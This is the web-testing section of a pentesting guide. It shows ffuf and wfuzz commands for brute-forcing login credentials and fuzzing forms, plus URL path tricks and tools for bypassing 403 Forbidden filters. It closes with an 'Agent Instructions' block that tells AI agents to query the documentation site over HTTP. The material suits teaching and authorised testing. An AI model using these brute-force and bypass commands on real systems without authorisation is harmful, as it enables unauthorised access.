# WEB ## Introduction Nowadays, websites are programmed using various technologies such as databases, web development frameworks, programming languages, APIs, data formats, protocols and browsers. Each of them has specific vulnerabilities that the developer should be aware of, which is not always the case, as you can see in [OWASP Top Ten](https://owasp.org/www-project-top-ten/). This section contains several vulnerabilities worth checking if you encounter a web pentesting. ## Form fuzzing During a web vulnerability assessment, it is for sure that the web page might have one or several post forms asking for user data. Fuzzing the forms might allow you to brute force credentials or discover vulnerabilities like SSTI, SQLi, XSS, etc. ```bash ffuf -w "./usuarios.txt:USERS" -w "./wordlist.txt:PASSWDS" -t 60 -u http:///login -H "Content-Type: application/json;charset=utf-8" -X POST -d '{"username":"USERS","password":"PASSWDS"}' ``` There might also be the case that you need to encode the data (URL format, base64, etc.) before sending it to the server. For doing so, you need to use **wfuzz** because **ffuf** **doesn't** support it. ```bash wfuzz -u http:///search -H 'Content-Type: application/x-www-form-urlencoded' -X POST -d 'name=FUZZ' -z file,/usr/share/wordlists/SecLists/Fuzzing/special-chars.txt,urlencode ``` ## Bypass Forbidden If the web service is misconfigured, you can try several techniques and tools to bypass filters. ```bash GET /admin ==> 403 Forbidden GET /blablabal/%2e%2e/admin ==> 200 OK GET /blablabal/..;/admin ==> 200 OK GET /blablabal/;/admin ==> 200 OK GET /blablabal/admin/..;/ ==> 200 OK GET /admin?access=1 ==> 200 OK ``` There are several tools that you can use to try to bypass such filters: * [bypass-url-parser](https://github.com/laluka/bypass-url-parser) * [dontgo403](https://github.com/devploit/dontgo403) * [forbidden](https://github.com/ivan-sincek/forbidden) * [byp4xx](https://github.com/lobuhi/byp4xx) **Note**: If you want to try all them at the same time you can use [403bypasser\_installer.sh](https://github.com/Marmeus/Kali-Booster/blob/main/Scripts/403bypasser_installer.sh) to install such tools and [403bypasser.sh](https://github.com/Marmeus/Kali-Booster/blob/main/Scripts/403bypasser.sh) to use them. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://the-pentesting-guide.marmeus.com/web.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.